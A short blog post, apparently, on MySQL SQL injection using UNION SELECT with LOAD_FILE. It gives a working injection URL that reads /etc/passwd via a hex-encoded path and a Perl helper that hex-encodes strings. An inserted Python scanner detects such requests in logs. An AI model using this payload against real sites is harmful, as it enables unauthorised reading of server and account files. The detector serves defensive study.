MYSQL LOAD_FILE SQL Injection

So today I was reading up on some SQL injection techniques and came across one that I had not seen before. I found out that it is possible to use a UNION SELECT with the built-in MySQL LOAD_FILE function to read the contents of any file on the system. This only works if the user has been granted permission to use the LOAD_FILE function, and of course the MySQL daemon must have permission to read the file. Also, I found out that the LOAD_FILE function can be used with hexadecimal characters.

Example Injection: www.example.com/article.php?id=1+union+select+LOAD_FILE(0x2f6574632f706173737764)

This will return the contents of /etc/passwd on a Linux machine.
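A log check for the request shown above, added here as an example and not part of the original post: it URL-decodes each request line, finds LOAD_FILE( calls, and decodes a 0x literal back to the path, which a plain search for "/etc/passwd" would miss. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# LOAD_FILE( followed by a 0x hex literal or a quoted string argument.
LOAD_FILE_RE = re.compile(
    r"load_file\s*\(\s*(?:0x([0-9a-f]+)|'([^']*)'|\"([^\"]*)\")",
    re.IGNORECASE,
)

def find_load_file_reads(request_line):
    """Return the file paths named by LOAD_FILE() calls in one request line."""
    decoded = unquote_plus(request_line)  # undo %xx escapes and '+' for space
    paths = []
    for match in LOAD_FILE_RE.finditer(decoded):
        hex_digits, single_quoted, double_quoted = match.groups()
        if hex_digits is not None:
            # MySQL treats an odd-length 0x literal as having a leading 0.
            if len(hex_digits) % 2:
                hex_digits = "0" + hex_digits
            paths.append(bytes.fromhex(hex_digits).decode("utf-8", "replace"))
        else:
            paths.append(single_quoted if single_quoted is not None else double_quoted)
    return paths

def scan(log_lines):
    """Return (line_number, path) for every LOAD_FILE() read found in the log."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        for path in find_load_file_reads(line):
            hits.append((number, path))
    return hits

# Constructed sample request lines (not taken from a real server).
SAMPLE_LOG = [
    "GET /article.php?id=1+union+select+LOAD_FILE(0x2f6574632f706173737764) HTTP/1.1",
    "GET /article.php?id=7 HTTP/1.1",
    "GET /article.php?id=1%20UNION%20SELECT%20load_file%280x2f6574632f706173737764%29 HTTP/1.1",
]

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: LOAD_FILE read of {path!r}")
```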

I also came across a handy Perl script today that will encode a given string into HEX.

Perl HEX converter:

Note: There is an underscore between LOAD and FILE.


use strict;
use warnings;

print "Enter string to encode: ";
my $str = <STDIN>;
chomp $str;

my $enc = encode($str);
print "Hex Encoded value: 0x$enc\n";

# Encode a string as hex digits, two per byte
sub encode {
    my ($sqlstr) = @_;
    my $encoded = '';
    foreach my $byte (unpack("C*", $sqlstr)) {
        # %02x zero-pads, so bytes below 0x10 still produce two digits
        $encoded .= sprintf('%02x', $byte);
    }
    return $encoded;
}